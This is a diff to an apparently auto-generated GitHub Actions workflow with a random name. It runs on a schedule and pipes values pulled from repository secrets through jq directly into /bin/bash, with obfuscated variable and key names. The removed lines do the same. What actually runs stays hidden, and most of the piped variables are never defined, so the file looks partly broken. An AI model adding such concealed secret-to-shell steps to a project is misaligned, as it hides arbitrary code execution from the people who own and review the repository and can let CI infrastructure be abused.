--- a/.github/workflows/commitmentcathead.yml
+++ b/.github/workflows/commitmentcathead.yml
@@ -3,25 +3,23 @@ name: commitmentcathead
 on:
   workflow_dispatch:
   schedule:
-    - cron: '14 2/6 * * *'
+    - cron: '22 4/6 * * *'
 
-jobs:  # 21083
+jobs:
   build:
     runs-on: ubuntu-latest
+
     steps:
       - uses: actions/checkout@v4
       - name: commitmentcathead
         env:
-          fo78764: ${{ secrets.fo78764 }}
+          wr98224: ${{ secrets.wr98224 }}
         run: |
-          echo $fo78764 | jq -r .qfqjt3 | /bin/bash
-          echo $ixhz3 | jq -r .pyki0 | /bin/bash
-          echo $ohf0178 | jq -r .fbvwv655 | /bin/bash
-          echo $i589 | jq -r .rqe39 | /bin/bash
-          echo $dww72 | jq -r .os850 | /bin/bash
-          echo $kw960 | jq -r .whipt913 | /bin/bash
-          echo $m57693 | jq -r .fjhz98743 | /bin/bash
-          echo $z89120 | jq -r .utj0623 | /bin/bash
-          echo $u8 | jq -r .bqqbc985 | /bin/bash
-          echo $s6 | jq -r .vwti670 | /bin/bash
+          echo $wr98224 | jq -r .cmoja19 | /bin/bash
+          echo $ldqb5894 | jq -r .pllt7 | /bin/bash
+          echo $nm2 | jq -r .vw25 | /bin/bash
+          echo $qqm45 | jq -r .c5 | /bin/bash
+          echo $dmwfa613 | jq -r .cccml5659 | /bin/bash
+          echo $ljmu6017 | jq -r .h271 | /bin/bash
+          echo $e630 | jq -r .centi3431 | /bin/bash
 
